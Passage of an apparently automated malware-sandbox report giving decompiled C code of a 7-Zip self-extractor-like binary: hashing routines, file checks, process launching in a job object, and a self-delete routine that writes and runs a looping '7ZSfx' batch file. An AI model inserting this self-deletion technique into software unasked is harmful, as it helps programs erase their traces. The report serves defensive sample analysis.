										 *_t184 =  *_t184 + ( *(_t275 + 0x4c + (_t225 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t225 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t225 & 0x0000000f) * 4) >> 0x00000003) + ( *(_t275 + 0x4c + (_t55 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t55 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t55 & 0x0000000f) * 4) >> 0x0000000a) +  *((intOrPtr*)(_t275 + 0x4c + (_t225 + 0xfffffff8 & 0x0000000f) * 4));
									}
									_t65 = _t148 + 2; // -2
									_t69 = _t148 + 3; // -1
									asm("ror ebx, 0x19");
									asm("ror ebp, 0xb");
									asm("ror ebp, 0x6");
									_t70 = _t148 + 1; // -3
									_t191 = _t275 + 0x2c + (_t69 & 0x00000007) * 4;
									 *_t191 =  *_t191 + (( *(_t275 + 0x2c + (_t70 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t65 & 0x00000007) * 4)) &  *(_t275 + 0x2c + (_t148 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t65 & 0x00000007) * 4)) + ( *(_t275 + 0x2c + (_t148 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t148 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t148 & 0x00000007) * 4)) +  *_t184 +  *_v124;
									_t78 = _t148 - 1; // -5
									 *((intOrPtr*)(_t275 + 0x2c + (_t78 & 0x00000007) * 4)) =  *((intOrPtr*)(_t275 + 0x2c + (_t78 & 0x00000007) * 4)) +  *_t191;
									_t88 = _t148 - 4; // -8
									_v124 = _v124 + 4;
									_t94 = _t148 - 3; // -7
									asm("ror edi, 0x16");
									asm("ror ebx, 0xd");
									asm("ror ebx, 0x2");
									_t98 = _t148 - 2; // -6
									_t205 = _v120;
									 *_t191 =  *_t191 + ( *(_t275 + 0x2c + (_t88 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4)) + ( *(_t275 + 0x2c + (_t98 & 0x00000007) * 4) & ( *(_t275 + 0x2c + (_t94 & 0x00000007) * 4) |  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4)) |  *(_t275 + 0x2c + (_t94 & 0x00000007) * 4) &  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4));
									_t225 = _v112 + 1;
									_t184 = _v108 + 4;
									_t148 = _t148 - 1;
									_t105 =  &_v104;
									 *_t105 = _v104 - 1;
									_v112 = _t225;
									_v108 = _t184;
								} while ( *_t105 != 0);
								_t205 = _t205 + 0x10;
								_v120 = _t205;
							} while (_t205 < 0x40);
							_t158 = _v100;
							 *_t158 =  *_t158 + _v96;
							 *((intOrPtr*)(_t158 + 4)) =  *((intOrPtr*)(_t158 + 4)) + _v92;
							 *((intOrPtr*)(_t158 + 0xc)) =  *((intOrPtr*)(_t158 + 0xc)) + _v84;
							 *((intOrPtr*)(_t158 + 8)) =  *((intOrPtr*)(_t158 + 8)) + _v88;
							 *((intOrPtr*)(_t158 + 0x10)) =  *((intOrPtr*)(_t158 + 0x10)) + _v80;
							 *((intOrPtr*)(_t158 + 0x18)) =  *((intOrPtr*)(_t158 + 0x18)) + _v72;
							_t140 = _a4;
							 *((intOrPtr*)(_t158 + 0x14)) =  *((intOrPtr*)(_t158 + 0x14)) + _v76;
							 *((intOrPtr*)(_t158 + 0x1c)) =  *((intOrPtr*)(_t158 + 0x1c)) + _v68;
							if(_t140 >= 0x40) {
								_a4 = _t140 - 0x40;
								_t155 = memcpy(_t158 + 0x28, _v116, 0x10 << 2);
								_t275 = _t275 + 0xc;
								_v116 = _t155;
								continue;
							}
							if(_t140 != 0) {
								_t140 = memcpy(_t158 + 0x28, _v116, _t140);
							}
							goto L17;
						}
					} else {
						return memcpy(_t142 + __ecx + 0x28, __edx, _t177);
					}
				}
			}

































                                          0x0040b354
                                          0x0040b356
                                          0x0040b35e
                                          0x0040b360
                                          0x0040b366
                                          0x0040b5f8
                                          0x0040b5fd
                                          0x0040b36c
                                          0x0040b36f
                                          0x0040b372
                                          0x0040b37b
                                          0x0040b37f
                                          0x0040b383
                                          0x0040b3a1
                                          0x0040b3ae
                                          0x0040b3b3
                                          0x0040b3b8
                                          0x0040b3c0
                                          0x0040b3c0
                                          0x0040b3c2
                                          0x0040b3c5
                                          0x0040b3c8
                                          0x0040b3ca
                                          0x0040b3d1
                                          0x0040b3d3
                                          0x0040b3d9
                                          0x0040b3db
                                          0x0040b3e2
                                          0x0040b3e4
                                          0x0040b3e8
                                          0x0040b3eb
                                          0x0040b3ee
                                          0x0040b3fb
                                          0x0040b402
                                          0x0040b409
                                          0x0040b410
                                          0x0040b417
                                          0x0040b41e
                                          0x0040b422
                                          0x0040b424
                                          0x0040b428
                                          0x0040b42c
                                          0x0040b430
                                          0x0040b430
                                          0x0040b435
                                          0x0040b440
                                          0x0040b444
                                          0x0040b444
                                          0x0040b447
                                          0x0040b44b
                                          0x0040b44f
                                          0x0040b457
                                          0x0040b459
                                          0x0040b468
                                          0x0040b472
                                          0x0040b475
                                          0x0040b481
                                          0x0040b486
                                          0x0040b49c
                                          0x0040b49c
                                          0x0040b4ab
                                          0x0040b4b7
                                          0x0040b4bd
                                          0x0040b4c0
                                          0x0040b4c7
                                          0x0040b4ce
                                          0x0040b4e6
                                          0x0040b4ea
                                          0x0040b4ee
                                          0x0040b4f4
                                          0x0040b4fc
                                          0x0040b506
                                          0x0040b50b
                                          0x0040b517
                                          0x0040b51c
                                          0x0040b523
                                          0x0040b528
                                          0x0040b538
                                          0x0040b542
                                          0x0040b54c
                                          0x0040b54d
                                          0x0040b550
                                          0x0040b551
                                          0x0040b551
                                          0x0040b555
                                          0x0040b559
                                          0x0040b559
                                          0x0040b563
                                          0x0040b566
                                          0x0040b56a
                                          0x0040b573
                                          0x0040b57b
                                          0x0040b581
                                          0x0040b588
                                          0x0040b597
                                          0x0040b59a
                                          0x0040b59d
                                          0x0040b5a8
                                          0x0040b5af
                                          0x0040b5b2
                                          0x0040b5b8
                                          0x0040b5bd
                                          0x0040b5d5
                                          0x0040b5d5
                                          0x0040b5d7
                                          0x00000000
                                          0x0040b5d7
                                          0x0040b5e3
                                          0x0040b5ef
                                          0x0040b5f4
                                          0x00000000
                                          0x0040b5f7
                                          0x0040b385
                                          0x0040b39a
                                          0x0040b39a
                                          0x0040b383

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: XhV
                                          • API String ID: 3510742995-2999104372
                                          • Opcode ID: d6942c357802de02a4ab3024b27633177e67036e1672e6741ee266c6f5ccec93
                                          • Instruction ID: 82061447c1ab4fd48cb6848a21138f0f9f11a7250b43c753729ffff071a4e147
                                          • Opcode Fuzzy Hash: d6942c357802de02a4ab3024b27633177e67036e1672e6741ee266c6f5ccec93
                                          • Instruction Fuzzy Hash: 1F916CB29043008FC318DF59D88458BB7E1FFC8314F1A8A6EE9489B356E375E955CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404402, Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404402(WCHAR* __ecx, FILETIME* __edx) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t7;
				signed int _t8;
				intOrPtr _t9;
				FILETIME* _t20;

				_t20 = __edx;
				_t7 = FindFirstFileW(__ecx,  &_v596);
				if(_t7 != 0xffffffff) {
					_t8 = FindClose(_t7);
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						_t9 =  *0x422778; // 0x2
						if(_t9 != 0) {
							if(_t9 != 2 || CompareFileTime( &(_v596.ftLastWriteTime), _t20) >= 0) {
								return 1;
							} else {
								goto L5;
							}
						}
						L5:
						return E004043D5();
					}
					SetLastError(0x10);
					return _t8 | 0xffffffff;
				}
				return 0;
			}








                                          0x00404417
                                          0x00404419
                                          0x00404422
                                          0x00404429
                                          0x00404436
                                          0x00404445
                                          0x0040444c
                                          0x0040445a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040445a
                                          0x0040444e
                                          0x00000000
                                          0x00404450
                                          0x0040443a
                                          0x00000000
                                          0x00404440
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,-00000001), ref: 00404419
                                          • FindClose.KERNEL32(00000000), ref: 00404429
                                          • SetLastError.KERNEL32(00000010), ref: 0040443A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Find$CloseErrorFileFirstLast
                                          • String ID:
                                          • API String ID: 4020440971-0
                                          • Opcode ID: 1dd38c34050e32057a86cfd6f887252e6440109f0c7138c7ef1928e7de9965fb
                                          • Instruction ID: e28eadc660d29d22e42b67850f94827f0221515ef145fc3d082d2b957231e6be
                                          • Opcode Fuzzy Hash: 1dd38c34050e32057a86cfd6f887252e6440109f0c7138c7ef1928e7de9965fb
                                          • Instruction Fuzzy Hash: CEF0A4F5A0012467DB2027349C4CFAA37ACABC1329F204676EA52F25D0D778C942961E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403442, Relevance: 6.0, APIs: 4, Instructions: 35fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403442(WCHAR* __ecx) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t5;
				int _t10;
				void* _t15;
				WCHAR* _t16;

				_t16 = __ecx;
				if( *0x4228d8 == 0) {
					_t5 = FindFirstFileW(__ecx,  &_v596);
					__eflags = _t5 - 0xffffffff;
					if(_t5 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t5);
					__eflags = _v596.dwFileAttributes & 0x00000010;
					if(__eflags != 0) {
						return E00403327(_t16, _t15, __eflags);
					}
					_t10 = SetFileAttributesW(_t16, 0);
					__eflags = _t10;
					if(_t10 == 0) {
						return 0;
					}
					return DeleteFileW(_t16);
				}
				L1:
				return 1;
			}








                                          0x00403453
                                          0x00403455
                                          0x00403464
                                          0x0040346a
                                          0x0040346d
                                          0x00000000
                                          0x00000000
                                          0x00403470
                                          0x00403476
                                          0x0040347d
                                          0x00000000
                                          0x0040349b
                                          0x00403482
                                          0x00403488
                                          0x0040348a
                                          0x00000000
                                          0x00403495
                                          0x00000000
                                          0x0040348d
                                          0x00403457
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00403464
                                          • FindClose.KERNEL32(00000000), ref: 00403470
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00403482
                                          • DeleteFileW.KERNEL32(?), ref: 0040348D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$Find$AttributesCloseDeleteFirst
                                          • String ID:
                                          • API String ID: 3319113142-0
                                          • Opcode ID: 4bf8c35936a22843f0fe7391aab8452746d3470be5817f0cd1b69b00b5c16dfa
                                          • Instruction ID: 6b212ce663ba0d1f229e145bf37a5fa1ef80438995da8d320f9543b1e0401fa5
                                          • Opcode Fuzzy Hash: 4bf8c35936a22843f0fe7391aab8452746d3470be5817f0cd1b69b00b5c16dfa
                                          • Instruction Fuzzy Hash: ADF05E70A10A14B6CB226F305D4C7AB3EACAB4132BF544576E852F91D0D77C8A4646AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D63, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 196threadprocesssynchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E00401D63(void* __ecx, void* __edx, void* __eflags) {
				void* _t58;
				void* _t83;
				void* _t88;
				int _t100;
				void* _t131;
				void* _t138;
				void* _t139;
				long _t140;
				intOrPtr* _t142;
				void* _t144;
				void* _t148;

				_t148 = __eflags;
				_t142 = _t144 - 0x74;
				_t131 = __ecx;
				_t138 = __edx;
				E004147DF(E004147DF(_t58, _t142 + 0x30), _t142 + 0x3c);
				E00403022(GetCommandLineW(), _t142 + 0x30);
				E004146E1(_t142 + 0xc, _t148, E00414787(_t142, E00414787(_t142 - 0xc, E004147B1(_t142 - 0x18, "\"", _t142 + 0x30), L"\" -"), L"sfxwaitall"), 0x3a);
				E004146E1(_t142 + 0x24, _t148, _t142 + 0xc,  *(_t142 + 0x7c) + 0x30);
				E004146E1(_t142 + 0x18, _t148, _t142 + 0x24, 0x20);
				E004146E1(_t142 + 0x5c, _t148, _t142 + 0x18, 0x22);
				E00414864(_t142 + 0x3c,  *((intOrPtr*)(E00414787(_t142 - 0x24, E00414787(_t142 - 0x30, E00414787(_t142 - 0x3c, _t142 + 0x5c, _t131), L"\" "), _t138))));
				_push( *((intOrPtr*)(_t142 - 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0x30)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0x3c)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0x5c)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0xc)));
				L0041C160();
				_push( *_t142);
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0xc)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0x18)));
				L0041C160();
				 *(_t142 - 0x80) = 0x44;
				GetStartupInfoW(_t142 - 0x80);
				_t83 = CreateProcessW(0,  *(_t142 + 0x3c), 0, 0, 1, 0x1000004, 0,  *0x42289c, _t142 - 0x80, _t142 + 0x48);
				if(_t83 != 0) {
					_t139 = 0;
					__imp__CreateJobObjectW(0, 0);
					 *(_t142 + 0x7c) = _t83;
					__eflags = _t83;
					if(_t83 == 0) {
						L9:
						ResumeThread( *(_t142 + 0x4c));
						WaitForSingleObject( *(_t142 + 0x48), 0xffffffff);
						L10:
						CloseHandle( *(_t142 + 0x4c));
						_t88 = GetExitCodeProcess( *(_t142 + 0x48), _t142 + 0x6c);
						__eflags = _t88;
						if(_t88 == 0) {
							 *(_t142 + 0x6c) = GetLastError();
						}
						CloseHandle( *(_t142 + 0x48));
						__eflags = _t139;
						if(_t139 != 0) {
							CloseHandle(_t139);
						}
						__eflags =  *(_t142 + 0x7c);
						if( *(_t142 + 0x7c) != 0) {
							CloseHandle( *(_t142 + 0x7c));
						}
						_t140 =  *(_t142 + 0x6c);
						L2:
						_push( *(_t142 + 0x3c));
						L0041C160();
						_push( *((intOrPtr*)(_t142 + 0x30)));
						L0041C160();
						return _t140;
					}
					__imp__AssignProcessToJobObject(_t83,  *(_t142 + 0x48));
					__eflags = _t83;
					if(_t83 == 0) {
						goto L9;
					}
					_t139 = CreateIoCompletionPort(0xffffffff, 0, 1, 0);
					__eflags = _t139;
					if(_t139 == 0) {
						goto L9;
					}
					 *((intOrPtr*)(_t142 + 0x60)) = 1;
					 *(_t142 + 0x64) = _t139;
					__imp__SetInformationJobObject( *(_t142 + 0x7c), 7, _t142 + 0x60, 8);
					ResumeThread( *(_t142 + 0x4c));
					while(1) {
						_t100 = GetQueuedCompletionStatus(_t139, _t142 + 0x70, _t142 + 0x68, _t142 + 0x58, 0xffffffff);
						__eflags = _t100;
						if(_t100 == 0) {
							goto L9;
						}
						__eflags =  *(_t142 + 0x70) - 4;
						if( *(_t142 + 0x70) == 4) {
							goto L10;
						}
					}
					goto L9;
				}
				_t140 = GetLastError();
				goto L2;
			}














                                          0x00401d63
                                          0x00401d64
                                          0x00401d71
                                          0x00401d76
                                          0x00401d80
                                          0x00401d90
                                          0x00401dca
                                          0x00401ddd
                                          0x00401deb
                                          0x00401df9
                                          0x00401e29
                                          0x00401e2e
                                          0x00401e31
                                          0x00401e36
                                          0x00401e39
                                          0x00401e3e
                                          0x00401e41
                                          0x00401e46
                                          0x00401e49
                                          0x00401e4e
                                          0x00401e51
                                          0x00401e56
                                          0x00401e59
                                          0x00401e5e
                                          0x00401e61
                                          0x00401e66
                                          0x00401e69
                                          0x00401e6e
                                          0x00401e71
                                          0x00401e76
                                          0x00401e79
                                          0x00401e85
                                          0x00401e8c
                                          0x00401eb2
                                          0x00401eba
                                          0x00401ee4
                                          0x00401ee6
                                          0x00401eec
                                          0x00401eef
                                          0x00401ef1
                                          0x00401f55
                                          0x00401f58
                                          0x00401f63
                                          0x00401f69
                                          0x00401f72
                                          0x00401f7b
                                          0x00401f81
                                          0x00401f83
                                          0x00401f8b
                                          0x00401f8b
                                          0x00401f91
                                          0x00401f93
                                          0x00401f95
                                          0x00401f98
                                          0x00401f98
                                          0x00401f9a
                                          0x00401f9d
                                          0x00401fa2
                                          0x00401fa2
                                          0x00401fa4
                                          0x00401ec4
                                          0x00401ec4
                                          0x00401ec7
                                          0x00401ecc
                                          0x00401ecf
                                          0x00401edf
                                          0x00401edf
                                          0x00401ef7
                                          0x00401efd
                                          0x00401eff
                                          0x00000000
                                          0x00000000
                                          0x00401f0c
                                          0x00401f0e
                                          0x00401f10
                                          0x00000000
                                          0x00000000
                                          0x00401f1d
                                          0x00401f20
                                          0x00401f23
                                          0x00401f2c
                                          0x00401f40
                                          0x00401f4f
                                          0x00401f51
                                          0x00401f53
                                          0x00000000
                                          0x00000000
                                          0x00401f3a
                                          0x00401f3e
                                          0x00000000
                                          0x00000000
                                          0x00401f3e
                                          0x00000000
                                          0x00401f40
                                          0x00401ec2
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • GetCommandLineW.KERNEL32(0041D9F0,00000000,00000000), ref: 00401D85
                                            • Part of subcall function 004146E1: memcpy.MSVCRT ref: 00414706
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E39
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E41
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E49
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E51
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E59
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E61
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E69
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E71
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E79
                                          • GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E8C
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 00401EB2
                                          • GetLastError.KERNEL32 ref: 00401EBC
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401EC7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401ECF
                                          • CreateJobObjectW.KERNEL32 ref: 00401EE6
                                          • AssignProcessToJobObject.KERNEL32 ref: 00401EF7
                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000), ref: 00401F06
                                          • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00401F23
                                          • ResumeThread.KERNEL32(?), ref: 00401F2C
                                          • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF), ref: 00401F4F
                                          • ResumeThread.KERNEL32(?), ref: 00401F58
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401F63
                                          • CloseHandle.KERNEL32(?), ref: 00401F72
                                          • GetExitCodeProcess.KERNEL32 ref: 00401F7B
                                          • GetLastError.KERNEL32 ref: 00401F85
                                          • CloseHandle.KERNEL32(?), ref: 00401F91
                                          • CloseHandle.KERNEL32(00000000), ref: 00401F98
                                          • CloseHandle.KERNEL32(?), ref: 00401FA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$CloseHandleObject$CreateProcess$??2@CompletionErrorLastResumeThreadmemcpy$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                          • String ID: " -$sfxwaitall
                                          • API String ID: 1989023053-3991362806
                                          • Opcode ID: 8de517175050c73336740f3d7500399dbb2a96b63e29ba91ff7f4985e0ad06e9
                                          • Instruction ID: b35bb808f7c11860acb9b83f91dbbd997240e1bc6af43985ebd9c44236cdfafe
                                          • Opcode Fuzzy Hash: 8de517175050c73336740f3d7500399dbb2a96b63e29ba91ff7f4985e0ad06e9
                                          • Instruction Fuzzy Hash: 03619972540108BFCF15AF61DC85DEE3BB9AF04308B10813AF926A21B1DB389D51CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405AA6, Relevance: 38.6, APIs: 14, Strings: 8, Instructions: 145fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E00405AA6(void* __esi, WCHAR* _a4) {
				long _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				long _v24;
				char _v28;
				WCHAR* _v40;
				char _v52;
				void* _t42;
				short _t44;
				short _t45;
				int _t66;
				void* _t72;
				signed int _t74;
				void* _t99;

				_t99 = __esi;
				_t42 = _a4;
				if( *((short*)(_t42 + 2)) != 0x3a) {
					L11:
					_push(_t42);
					goto L12;
				} else {
					_t3 = _t42 + 4; // 0x1519c
					_t74 =  *_t3 & 0x0000ffff;
					if(_t74 == 0x5c || _t74 == 0x2f) {
						_v16 =  *_t42;
						_t44 = 0x3a;
						_v14 = _t44;
						_t45 = 0x5c;
						_v12 = _t45;
						_v10 = 0;
						_t42 = GetDriveTypeW( &_v16);
						if(_t42 == 3) {
							E004042B5(L"7ZSfx%03x.cmd", __eflags);
							_t42 = CreateFileW(_v40, 0x40000000, 0, 0, 2, 0x80, 0);
							_t72 = _t42;
							__eflags = _t72 - 0xffffffff;
							if(_t72 == 0xffffffff) {
								L9:
								_push(_v40);
								L0041C160();
								_push(_a4);
								L0041C160();
								goto L13;
							} else {
								_push(_t99);
								E004147DF(_t42,  &_v28);
								E00414864( &_v28, L":Repeat\r\n");
								E00414922( &_v28, L"del \"");
								E00414962( &_v28, __eflags,  &_a4);
								E00414922( &_v28, L"\"\r\n");
								E00414922( &_v28, L"if exist \"");
								E00414962( &_v28, __eflags,  &_a4);
								E00414922( &_v28, L"\" goto Repeat\r\n");
								E00414922( &_v28, L"del \"");
								E00414962( &_v28, __eflags,  &_v40);
								E00414922( &_v28, L"\"\r\n");
								_t66 = WriteFile(_t72,  *(E0040438B( &_v52,  &_v28, __eflags, 1)), _v24,  &_v8, 0);
								_push(_v52);
								L0041C160();
								CloseHandle(_t72);
								__eflags = _t66;
								if(_t66 == 0) {
									L10:
									_t42 = E00403442(_v40);
									_push(_v28);
									L0041C160();
									_push(_v40);
									L0041C160();
									_push(_a4);
									L0041C160();
								} else {
									__eflags = _v8 - _v24;
									if(_v8 != _v24) {
										goto L10;
									} else {
										SetFileAttributesW(_a4, 0);
										_t42 = ShellExecuteW(0, L"open", _v40, 0, 0, 0);
										_push(_v28);
										L0041C160();
										goto L9;
									}
								}
							}
						} else {
							_push(_a4);
							L12:
							L0041C160();
							L13:
						}
					} else {
						goto L11;
					}
				}
				return _t42;
			}



















                                          0x00405aa6
                                          0x00405aa9
                                          0x00405ab6
                                          0x00405c52
                                          0x00405c52
                                          0x00000000
                                          0x00405abc
                                          0x00405abc
                                          0x00405abc
                                          0x00405ac3
                                          0x00405ad3
                                          0x00405ad7
                                          0x00405ad8
                                          0x00405ade
                                          0x00405adf
                                          0x00405ae5
                                          0x00405aed
                                          0x00405af6
                                          0x00405b08
                                          0x00405b21
                                          0x00405b27
                                          0x00405b29
                                          0x00405b2c
                                          0x00405c1a
                                          0x00405c1a
                                          0x00405c1d
                                          0x00405c22
                                          0x00405c25
                                          0x00000000
                                          0x00405b32
                                          0x00405b32
                                          0x00405b36
                                          0x00405b43
                                          0x00405b51
                                          0x00405b5d
                                          0x00405b6b
                                          0x00405b78
                                          0x00405b84
                                          0x00405b91
                                          0x00405b9a
                                          0x00405ba6
                                          0x00405baf
                                          0x00405bd0
                                          0x00405bd6
                                          0x00405bdb
                                          0x00405be2
                                          0x00405be8
                                          0x00405beb
                                          0x00405c2d
                                          0x00405c30
                                          0x00405c35
                                          0x00405c38
                                          0x00405c3d
                                          0x00405c40
                                          0x00405c45
                                          0x00405c48
                                          0x00405bed
                                          0x00405bf0
                                          0x00405bf3
                                          0x00000000
                                          0x00405bf5
                                          0x00405bf9
                                          0x00405c0b
                                          0x00405c11
                                          0x00405c14
                                          0x00000000
                                          0x00405c19
                                          0x00405bf3
                                          0x00405beb
                                          0x00405af8
                                          0x00405af8
                                          0x00405c53
                                          0x00405c53
                                          0x00405c58
                                          0x00405c58
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ac3
                                          0x00405c5c

                                          APIs
                                          • GetDriveTypeW.KERNEL32(?,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844,PreExtract), ref: 00405AED
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041DA3C,?,00000000,?,00405B0D), ref: 004042D7
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405B0D), ref: 004042F6
                                            • Part of subcall function 004042B5: wsprintfW.USER32 ref: 00404318
                                            • Part of subcall function 004042B5: GetFileAttributesW.KERNELBASE(?,?,?,00405B0D,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844), ref: 0040432A
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405B21
                                          • WriteFile.KERNEL32(00000000,?,?,00422844,00000000,00000001,",?,del "," goto Repeat,00406FBC,if exist ",",00406FBC,del ",:Repeat), ref: 00405BD0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405BDB
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844,PreExtract,0042289C,00000000), ref: 00405BE2
                                          • SetFileAttributesW.KERNEL32(00406FBC,00000000,?,?,?,?,?,?,?,?,?,00406FBC,00422844,PreExtract,0042289C,00000000), ref: 00405BF9
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405C0B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C14
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C1D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C25
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414962: memcpy.MSVCRT ref: 00414985
                                            • Part of subcall function 0040438B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00000000,00422090,00566790,00401669,0000FDE9,00566790), ref: 004043BE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C38
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C40
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C48
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
